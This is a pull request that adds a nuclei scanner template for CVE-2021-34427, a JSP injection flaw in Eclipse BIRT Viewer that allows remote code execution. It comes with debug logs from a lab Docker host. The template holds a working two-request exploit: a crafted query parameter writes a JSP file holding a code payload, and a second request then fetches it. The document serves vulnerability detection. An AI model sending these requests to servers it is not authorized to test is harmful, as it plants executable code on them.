### PR TITLE
Add CVE-2021-34427 BIRT Remote code execution

### DIFF
--- a/http/cves/2021/CVE-2021-34427.yaml
+++ b/http/cves/2021/CVE-2021-34427.yaml
@@ -1,11 +1,11 @@
 id: CVE-2021-34427
 
 info:
-  name: BIRT Viewer - Remote Code Execution
-  author: us3r777 / Synacktiv
+  name: Eclipse BIRT Viewer - Remote Code Execution
+  author: us3r777,Synacktiv
   severity: critical
   description: |
-    Detects a remote code execution vulnerability in BIRT Viewer <= 4.11
+    Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
   reference:
     - https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142
     - https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/
@@ -16,38 +16,36 @@ info:
     cve-id: CVE-2021-34427
     cwe-id: CWE-434
     cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: vendor
+    product: business_intelligence_and_reporting_tools
+    shodan-query: 'http.title:"eclipse birt home"'
   tags: cve,cve2021,birt,rce,file-upload,intrusive,vuln
 
 variables:
   filename: "{{rand_base(20)}}"
   fingerprint: "{{rand_base(20)}}"
+  payload: "<%out.println(\"{{fingerprint}}\");%>"
 
-flow: |
-  http(1) && http(2)
+flow: http(1) && http(2)
 
 http:
   - raw:
       - |
-        GET /birt/document?__report=test.rptdesign&sample=<%25out.println(%22{{fingerprint}}%22)%3b%25>&__document=./test/{{filename}}.jsp/. HTTP/1.1
+        GET /document?__report=test.rptdesign&sample={{url_encode(payload)}}&__document=./test/{{filename}}.jsp/. HTTP/1.1
         Host: {{Hostname}}
 
       - |
-        GET /birt/test/{{filename}}.jsp HTTP/1.1
+        GET /test/{{filename}}.jsp HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - '{{fingerprint}}'
-
-      - type: word
-        part: header
-        words:
-          - 'text/html'
-
-      - type: status
-        status:
-          - 200
-
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body_1, "The report document file has been generated successfully.")'
+          - 'contains(body_2, "{{fingerprint}}")'
+          - 'contains(header_2, "text/html")'
+        condition: and


### PR DESCRIPTION
### PR Information

Add a new template to check for CVE-2021-34427. The exploit leverage a bypass that was discovered later on hence vulnerable version should be BIRT <= 4.11.

- Added CVE-2021-34427 Remote code execution in BIRT Viewer 
- References: 
    - https://eclipse.github.io/birt-website/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34427
    - https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/

### Template validation
The template was run against BIRT 4.5.0 using a docker from [psimonov/birt-viewer](https://hub.docker.com/r/psimonov/birt-viewer)

- [X] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

```
$ nuclei -t ~/nuclei-templates/u7/CVE-2021-34427.yaml -u http://172.17.0.2:8080/ -vv -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

		projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Scan completed in 3.600095ms. No results found.
[20:55:45] user@dev-nuclei [ /home/user/nuclei-templates ]
$ nuclei -t ~/nuclei-templates/u7/CVE-2021-34427.yaml -u http://172.17.0.5:8080/ -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

		projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-34427] Dumped HTTP request for http://172.17.0.5:8080/birt/document?__report=test.rptdesign&sample=<%25out.println(%22SS44yOuwrYtM9f4PnF4I%22)%3b%25>&__document=./test/g2Fq3N0omkkGpHaxnUZj.jsp/.

GET /birt/document?__report=test.rptdesign&sample=<%25out.println(%22SS44yOuwrYtM9f4PnF4I%22)%3b%25>&__document=./test/g2Fq3N0omkkGpHaxnUZj.jsp/. HTTP/1.1
Host: 172.17.0.5:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/9.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2021-34427] Dumped HTTP response http://172.17.0.5:8080/birt/document?__report=test.rptdesign&sample=<%25out.println(%22SS44yOuwrYtM9f4PnF4I%22)%3b%25>&__document=./test/g2Fq3N0omkkGpHaxnUZj.jsp/.

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
Date: Mon, 17 Nov 2025 19:55:58 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB67D78CAEDC09F4761E36FBC7F4E9B9; Path=/birt/; HttpOnly

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head><body style="background-color: #ECE9D8;"><div style="font-size:10pt;"><font color="black">The report document file has been generated successfully.</font></div></body></html>
[INF] [CVE-2021-34427] Dumped HTTP request for http://172.17.0.5:8080/birt/test/g2Fq3N0omkkGpHaxnUZj.jsp

GET /birt/test/g2Fq3N0omkkGpHaxnUZj.jsp HTTP/1.1
Host: 172.17.0.5:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Cookie: JSESSIONID=AB67D78CAEDC09F4761E36FBC7F4E9B9
Accept-Encoding: gzip

[DBG] [CVE-2021-34427] Dumped HTTP response http://172.17.0.5:8080/birt/test/g2Fq3N0omkkGpHaxnUZj.jsp

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 17 Nov 2025 19:55:58 GMT
Server: Apache-Coyote/1.1

RPTDOCV2�
         '	9@.�


#	reportdocument	CORE_VERSION_2	
                                        2.1.3-2.2RC0
                                                    	page hint version	3	BIRT ENGINE BUILD NUMBER	M/usr/local/tomcat/webapps/birt/WEB-INF/lib/org.eclipse.birt.runtime_4.5.0.jar	BIRT ENGINE VERSION	2.6.1	2file:/usr/local/tomcat/webapps/birt/test.rptdesign
X�ur[Ljava.lang.Object;�s)lxpt(SS44yOuwrYtM9f4PnF4I                                                                                	sample
p
 <?xml version="1.0" encoding="UTF-8"?><report xmlns="http://www.eclipse.org/birt/2005/design" version="3.2.23" id="1"><property name="author">Bertie the Platypus</property><property name="comments">Not a very interesting report, just a "Hello World" with a param.</property><property name="createdBy">Eclipse BIRT Designer Version 1.0.0 Build &lt;20050405-1230></property><html-property name="description">Sample report used to test the BIRT viewer.</html-property><property name="units">in</property><property name="layoutPreference">auto layout</property><list-property name="configVars"><structure><property name="name">sample</property><property name="value">aaa</property></structure></list-property><parameters><scalar-parameter name="sample" id="2"><text-property name="displayName">Sample Parameter</text-property><property name="hidden">false</property><property name="isRequired">false</property><property name="dataType">string</property><property name="concealValue">false</property><property name="controlType">text-box</property><property name="mustMatch">true</property><property name="fixedOrder">false</property></scalar-parameter></parameters><page-setup><simple-master-page name="Simple MasterPage" id="3"><property name="topMargin">1in</property><property name="leftMargin">1.25in</property><property name="bottomMargin">1in</property><property name="rightMargin">1.25in</property><page-header><grid id="4"><property name="width">100%</property><column id="5"/><row id="6"><cell id="7"><property name="fontSize">xx-large</property><property name="fontWeight">bold</property><property name="textAlign">center</property><text id="8"><text-property name="content"><![CDATA[Title]]></text-property></text></cell></row></grid></page-header><page-footer><grid id="9"><property name="width">100%</property><column id="10"/><column id="11"/><row id="12"><cell id="13"><text id="14"><property name="contentType">html</property><text-property name="content"><![CDATA[<value-of>new Date()</value-of>]]></text-property></text></cell><cell id="15"><property name="textAlign">right</property><auto-text id="26"><property name="type">page-number</property></auto-text></cell></row></grid></page-footer></simple-master-page></page-setup><body><text id="17"><property name="contentType">html</property><text-property name="content"><![CDATA[<b>Congratulations!</b>
<br><br>
If you can see this report, it means that the BIRT viewer is installed correctly.
<br><br>]]></text-property></text><grid id="18"><property name="width">100%</property><column id="19"><property name="width">1.354in</property></column><column id="20"><property name="width">5.083in</property></column><row id="21"><cell id="22"><label id="23"><text-property name="text">Sample Parameter:</text-property></label></cell><cell id="24"><data id="25"><list-property name="boundDataColumns"><structure><property name="name">params["sample"]</property><expression name="expression">params["sample"]</expression></structure></list-property><property name="resultSetColumn">params["sample"]</property></data></cell></row></grid></body></report>		3.2.23		2.6.1�	style_2	
text-align	center	
                        font-weight	bold		font-size	xx-large	style_3	
text-align	right	style_0	color	black	
                                                line-height	normal	
                                                                        text-indent	0em	text-linethrough	none	orphans	2	
                                                                                                                                                font-weight	normal	
text-overline	none-vartext-transform	none		font-size	10pt	
font-style	normal	letter-spacing	normal	widows	2	
                                                                font-family	serif	page-break-inside	auto	text-underline	none	
                                                                                                                                                word-spacing	normal	
                white-space	normal	style_1	width	100%	style_0�
	Simple MasterPage�		us-letter�	in@!	in@&�	in?�	in?�	in?�	in?��	auto�	in?��	in?�
[	style_1	%@YF




	style_2d
*       auton	Title
m		style_1	%@YF









d
D	htmln	<value-of>new Date()</value-of>
	style_3d
	
        page-number�
	htmln	{<b>Congratulations!</b>
<br><br>
If you can see this report, it means that the BIRT viewer is installed correctly.
<br><br>
�	style_1	%@YF
5	in?�D
5	in@T�


d
'n	Sample Parameter:
d
"y	params["sample"]	Simple MasterPage		/1.3	auto		us-letter	in@&	in@!	in?�	in?��	in?��	in?��	in?��	in?���		/0.-1[V
	%@Y		/0.4�	/5��    	/0.6 [�%		/0.7defh		/0.8Y	Title4		/1.-1a		/2.-14�l
�ur[Ljava.lang.Object;�s)lxppsrjava.util.HashMap��`�F   /0.12 �\^&		/0.13defh�		/0.14	
loadFactorI	thresholdxp?@
                             t
new Date()srjava.util.DatehjKYtxpcpDxx�&		/1.15defh\
.�ur[Ljava.lang.Object;�s)lxpppA                                  		/0.26^		/0.17	
		/1.18�	/19	/20     	/0.21
Total.OVERALL	params["sample"]"	(SS44yOuwrYtM9f4PnF4I66	params["sample"]	params["sample"]	params["sample"]	
	params["sample"]	params["sample"]	_$$_dte_inner_row_id_$$_	dataSetRow._rowPosition	Simple MasterPage	/0.17 	/1.18	/0.21	/1.24	/0.25	
                        __version__2	-1	25	QuRs0	-1	Simple MasterPage	__Version : 3.0	ata/hierarchy/DataEngine/NamingRelation(/DataEngine/QueryIdBasedVersioningStream
/QuRs0/DataSetData/QuRs0/DataSetLens/QuRs0/ExprMetaInfo/QuRs0/ExprRowLen/QuRs0/ExprValue/QuRs0/GroupInfo/QuRs0/QueryDefn/QuRs0/ResultClass/content/content.dat	/content/page.dat
/content/page.idx
                 /coreataEngine/queryStartingID/design
/design.ir/pages
                /pages_index/toc

                               	25	QuRs0
[CVE-2021-34427:word-1] [http] [critical] http://172.17.0.5:8080/birt/test/g2Fq3N0omkkGpHaxnUZj.jsp
[CVE-2021-34427:word-2] [http] [critical] http://172.17.0.5:8080/birt/test/g2Fq3N0omkkGpHaxnUZj.jsp
[CVE-2021-34427:status-3] [http] [critical] http://172.17.0.5:8080/birt/test/g2Fq3N0omkkGpHaxnUZj.jsp
[WRN] [CVE-2021-34427] Could not execute step on http://172.17.0.5:8080/: cause="[CVE-2021-34427] invalid request id '2' provided" chain="failed to execute http:2 protocol; got following errors while executing flow"
[INF] Scan completed in 1.759943476s. 3 matches found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
